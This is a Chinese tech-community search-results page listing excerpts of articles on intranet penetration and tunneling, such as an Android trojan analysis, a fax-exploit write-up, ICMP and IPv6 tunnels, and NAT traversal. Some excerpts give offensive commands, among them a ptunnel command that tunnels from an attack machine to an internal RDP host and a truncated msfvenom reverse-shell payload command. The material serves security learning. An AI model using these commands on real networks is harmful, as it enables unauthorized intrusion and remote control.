首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏FreeBuf

    内网穿透:Android木马进入高级攻击阶段

    概述 近日,360烽火实验室发现有数千个样本感染了一种名为“DressCode”的恶意代码,该恶意代码利用实下流行的SOCKS代理反弹技术突破内网防火墙限制,窃取内网数据。 这种通过代理穿透内网绕过防火墙的手段在PC上并不新鲜,然而以手机终端为跳板实现对企业内网的渗透还是首见[1]。 (三)攻击FTP服务器的过程 攻击者想要窃取内网FTP服务器数据时,会首先发送CONNECT指令,处于内网中的SOCKS服务端接收到此命令后,会试图和FTP服务器建立一个控制流,如果FTP服务器响应此请求 这样攻击者就通过木马完成了对内网文件服务器的数据窃取。 以上攻击过程如下图所示: ? 图5黑客攻击FTP服务器,窃取数据的过程 四.总结建议 “DressCode”恶意代码穿透能力强,地域分布广泛,已成为对内网安全的一种新的潜在威胁,减除接入企业内网的智能终端设备所带来的安全威胁客不容缓

    1.7K100发布于 2018-02-09
  • 来自专栏FreeBuf

    看我利用传真功能漏洞渗透进入企业内网

    这样一来,打开了企业内网之门,也就什么可能都存在了,攻击者可以潜伏在多功能一体机中,向脆弱的企业内网电脑发起“永恒之蓝”漏洞攻击,或通过传真方式窃取内网电脑数据并向外回传。 3 = G3 = ITU T.30 Compression T.4 = CCITT 1-D TIFF Compression Type 4 = G4 = ITU T.30 Compression T.6 因此,我们再对T.4 和 T.6 的代码压缩机制进行分析,没发现什么可以利用的漏洞。 T.30扩展 在Pahse B阶段,传真猫会进行功能交换,所以它可以找出能支持的最佳传输方式。 实际上,如果能通过打印机来控制整个企业内网,那影响和威胁就就非常之大了。 由此,我们通过传真漏洞远程实现企业内网的多功能一体机入侵控制,并以此为据点,可向企业内网深入进行横向渗透。

    1.8K10发布于 2018-09-21
  • 来自专栏网络安全攻防

    内网穿透之IPv6隧道

    、ICMP隧道、GRE隧道 传输层:TCP隧道、UDP隧道、常规端口转发 应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道 内网连通性 判断内网连通性是指判断机器是否能上外网,在判断时要综合判断各种协议 常见的允许流量流出的端口有80、8080、443、53、110、123等,常用的内网连通性判断方法如下: ICMP协议 执行命令"ping <IP地址或域名>",如下图所示: TCP协议 netcat dig nslookup是windows操作系统自带的DNS探测命令,其用法如下所示: dig是Linux默认自带的DNS探测命令,其用法如下所示: 代理服务器 还有一种情况是流量不能直接流出,需要在内网中设置代理服务器 ,常用于通过企业办公网段上网的场景,常用的判断方法如下: 查看网络连接,判断是否存在与其他机器的8080(不绝对)等端口的连接(可以尝试运行"ping -n 1 -a ip "命令) 查看内网中是否有主机名类似于 20多年,目前已近匮乏,而IPv6则能从根本上解决这些问题,现在,由于IPv4资源几乎耗尽,IPv6开始进入过渡阶段。

    6.7K10编辑于 2022-09-07
  • 来自专栏TeamsSix的网络空间安全专栏

    内网学习笔记 | 6、ICMP隧道工具使用

    1、介绍 在内网中,如果攻击者使用 HTTP、DNS 等应用层隧道都失败了,那么或许可以试试网络层的 ICMP 隧道,ICMP 协议最常见的场景就是使用 ping 命令,而且一般防火墙都不会禁止 ping cd PingTunnel make && make install ptunnel 常用命令介绍: -p: 指定跳板服务器 IP 地址 -lp: 监听本地 TCP 端口 -da: 指定访问目标的内网 Kali 攻击机 172.16.214.6 (外网) | | Linux Web 跳板机 172.16.214.5 (外网) | 192.168.7.5 (内网 ) | | Win RDP 目标机 192.168.7.110 (内网) 在 Kali 攻击机上执行以下命令 ptunnel -p 172.16.214.5 -lp 1080 -da 192.168.7.110 -dp 3389 -x teamssix -p 指定跳板机外网IP -lp 指定本机的监听端口 -da 指定目标机的内网IP -dp 指定目标机的端口 -x 设置隧道密码 在 Linux

    2K50发布于 2021-04-12
  • 来自专栏iSharkFly

    Confluence 6 白名单允许进入和禁用

    允许进入 启用 CORS 请求,将会从特定的 URL 来源中允许进入(Allow Incoming)。 https://www.cwiki.us/display/CONF6ZH/Configuring+the+Whitelist

    63740发布于 2019-01-30
  • 来自专栏网络安全攻防

    内网穿透之IPv6隧道构建使用

    、ICMP隧道、GRE隧道 传输层:TCP隧道、UDP隧道、常规端口转发 应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道 内网连通性 判断内网连通性是指判断机器是否能上外网,在判断时要综合判断各种协议 常见的允许流量流出的端口有80、8080、443、53、110、123等,常用的内网连通性判断方法如下: ICMP协议 执行命令"ping <IP地址或域名>",如下图所示: TCP协议 netcat( dig nslookup是windows操作系统自带的DNS探测命令,其用法如下所示: dig是Linux默认自带的DNS探测命令,其用法如下所示: 代理服务器 还有一种情况是流量不能直接流出,需要在内网中设置代理服务器 ,常用于通过企业办公网段上网的场景,常用的判断方法如下: 查看网络连接,判断是否存在与其他机器的8080(不绝对)等端口的连接(可以尝试运行"ping -n 1 -a ip "命令) 查看内网中是否有主机名类似于 20多年,目前已近匮乏,而IPv6则能从根本上解决这些问题,现在,由于IPv4资源几乎耗尽,IPv6开始进入过渡阶段。

    1.2K10编辑于 2024-06-19
  • 来自专栏码农沉思录

    我建议你尽早进入大厂的 6 个理由

    我经历了国企、外企、创业和 BAT,通过自己的亲身体会告诉大家,如果你想要在国内长期发展,请尽早进入大厂。 你一个百度的 T6 去了阿里绝对不会给你 P5,亚马逊的 SDE2 去了阿里也绝对不会给你一个 P6。大厂给你的定位和价值不仅仅是你的待遇,而是社会的认可。

    48230发布于 2019-05-05
  • 来自专栏好好学java的技术栈

    我建议你尽早进入大厂的 6 个理由

    我经历了国企、外企、创业和 BAT,通过自己的亲身体会告诉大家,如果你想要在国内长期发展,请尽早进入大厂。 你一个百度的 T6 去了阿里绝对不会给你 P5,亚马逊的 SDE2 去了阿里也绝对不会给你一个 P6。大厂给你的定位和价值不仅仅是你的待遇,而是社会的认可。

    38830发布于 2019-05-06
  • 来自专栏资讯类翻译专栏

    Wi-Fi 6已准备好进入黄金时段

    Wi-Fi Certified 6可确保整个行业的产品充分发挥Wi-Fi 6所承诺的潜力,并提供用户体验。” Wi-Fi认证6将改善连通性,包括在高密度位置和物联网环境中。” 更好的吞吐量 Wi-Fi 6包括了一些创新,可以提高网络性能,并减少向网络中添加设备可能导致的延迟。 ODFM是Wi-fi6的几个创新之一,应该能吸引消费者。 只有当网络上的设备支持Wi-Fi 6时,这些好处才能实现。 “很多设备还没有升级到Wi-Fi 6客户端,”吴说,“所以大多数人看不到他们现有设备的任何改进。” 尽管Wi-Fi联盟已经为新wifi6设备打开了进入市场的大门,但这并不是一个闸门。 Mist的Gilby说:“WiFi在过去的20年里经历了多种标准的传输,主流采用的主要驱动力是客户端设备。”。

    52230发布于 2020-12-18
  • 腾讯云轻量IPv6实现内网穿透

    一、前言 2024年,中央网信办、国家发改委、工信部联合印发《深入推进IPv6规模部署和应用2024年工作应用》,文中提出到2024年末: IPv6活跃用户达到8亿; 物联网IPv6连接达到6.5亿; 固定网IPv6流量占比23%,移动网占比65%。 作者家庭也已经荣幸地接入了支持IPv6的公网带宽。socat 代替frp实现内网穿透能避免内存占用过高和减少性能开销。 二、准备工作 2.1 检测是否成功获取 IPv6 https://test-ipv6.com 获取本机IP 如果本机是windows通过cmd执行ipconfig命令获取本机IPv6地址 ipconfig /pf.sh 增加端口映射即可 我也会持续更新本脚本 安全建议 内网穿透RDP(远程桌面)和SSH服务前必须确保使用非弱口令,否则会导致内网设备被爆破。 数据无价请谨慎映射内网服务

    1.4K20编辑于 2025-06-12
  • 来自专栏用户7230014的专栏

    全球互联网进入IPv6主导期 IPv6标准快速演进

    全球互联网进入IPv6主导期 亚洲增长强劲IPv6提供了更多创新能力和发展空间,中国工程院院士邬贺铨在会议上总结了当前IPv6发展趋势和特点,他认为全球互联网发展已经进入IPv6主导期,主要呈现三个特点 :第一,从IPv4向IPv6的过渡在加速;第二,从IPv4/IPv6双栈向IPv6 only发展;第三,IPv6向IPv6+发展,开发IPv6地址空间能力并与新一代IT的全面融合,IPv6正在发挥乘数效应 IPv6衍生和融合技术标准研发和创制同IPv6发展部署息息相关。随着IPv6在全球范围内的加速部署, IPv6标准化工作步入新阶段、呈现出新变化。 经过多年的部署渗透,IPv6发展已进入纯IPv6演进的绝佳时期。 与此同时,全球IPv6论坛还以2022年全球IPv6支持度发展情况为基础,评选出2022年度“IPv6杰出贡献企业”和“IPv6先锋企业”。

    61530编辑于 2023-01-06
  • 来自专栏黑白天安全团队

    内网渗透 | 内网穿透

    内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过QQ通信。 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!

    5.1K60发布于 2020-03-10
  • 来自专栏谢公子学安全

    内网渗透 | 内网穿透

    内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 192.168.10.10:22222 <——> 10000 当我们访问百度这个事情做完之后的一定时间内,Session记录就会在路由器的体内消失,这个10000端口可以继续分配给其他用户 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!

    3.5K10编辑于 2022-01-19
  • 来自专栏我有乐趣

    树莓派用IPV6拯救电信大内网(全版本)

    Blog的管理员密码了,233 想起来我已经好久没有写文章了,于是来水一篇,因为这几天一直在研究废物利用,啊呸,一直在研究怎么把我吃灰的树莓派4B合理的运用起来,可是一时间居然想不起来该拿来干嘛,因为电信大内网的缘故 我们这里三网的移动数据都是带有公网IPV6的,但是我不怎么确定我的宽带有没有IPV6,毕竟我光纤猫一直都是用的路由模式,没有获得过IPV6,于是我开始了尝试: 你需要准备: 1.树莓派 2.网线 3 基础上适配树莓派的脚本 第一步:验证是否有公网IPV6 验证链接:http://www.test-ipv6.com/ 如果你的局域网已经有了公网IPV6,则: ? 如果有公网IPV6的话就进入第二步,如果没有的话请百度或者咨询运营商把光纤猫的连接模式改为桥接模式,然后重启看看有没有公网IPV6 第二步:配置树莓派 先说明,我这里是路由器不支持IPV6(家境贫寒), 用ipv6远程ssh 你只要用有ipv6的设备(手机移动数据基本都有IPV6)用ssh连接你的域名即可,像这样: ? OK,本期完结,写文章写了三个多小时,不留个评论鼓励下???

    7.1K20发布于 2020-04-16
  • 来自专栏顶级程序员

    TIOBE 6月编程语言排行榜:Kotlin突围进入50强

    下面是本次排名榜单: 6月编程语言TOP 20榜单 ? ? TOP 10编程语言 TIOBE指数走势 ? 其它编程语言排名 ? ?

    1.1K70发布于 2018-05-03
  • 来自专栏安全小圈

    内网基础篇——浅谈内网

    内网也指局域网,是指某一区域内由多台计算机互联而成的计算机组,组网的范围通常是数千米内。 ? ? 在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ? ?

    2.4K40发布于 2020-05-26
  • 来自专栏字节脉搏实验室

    内网基础篇——浅谈内网

    在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 防火墙需要进行NAT 内网可以访问DMZ:此策略时用户可以使用或者管理DMZ中地服务器 外网不能访问内网:防火墙的基本策略,如需访问,通过V**的方式 外网可以访问DMZ:需要由防火墙来完成对外地址到服务器实际地址的转换 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ?

    1.9K40发布于 2020-05-25
  • 来自专栏程思阳的专栏

    教你一文教你使用自己的域名远程访问内网群晖NAS+6.X【内网穿透】

    文章目录 使用自己的域名远程访问内网群晖NAS 6.X【内网穿透】 使用自己的域名远程访问内网群晖NAS 6.X【内网穿透】 在之前的文章中,我们向大家演示了如何使用cpolar,创建一条固定的、能够在公共互联网登录内网群晖 当我们获得喜欢的域名后,就可以进入cpolar官网,在“预留”页面找到“保留自定义域名”栏,将购得的域名填入“域名”栏位;“地区”栏位则填入实际使用地区(需要注意的是国内所有自定义域名都需要备案,才能被正常访问 在新页面点击“解析设置”按钮 在转入的页面左上方,点击“添加记录” 点击“添加记录”后,就正式进入域名解析设置。我们需要填写的,就是“记录类型”、“主机记录”、“记录值”三项。 虽然我们完成了公共互联网上内网群晖NAS域名的更新,但此时http协议还处于不安全状态,地址链接很容易被劫持,因此我们还需要升级至https协议,让我们的数据安全更有保障。 转载自cpolar极点云文章:使用自己的域名远程访问内网群晖NAS 6.X【内网穿透】

    3K20编辑于 2023-07-31
  • 来自专栏小生观察室

    内网渗透之内网隧道构建

    image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。

    1.5K30发布于 2021-03-05
  • 来自专栏白安全组

    内网接收外网shell(内网穿透)

    前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。 (这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp

    2K20编辑于 2022-12-01
领券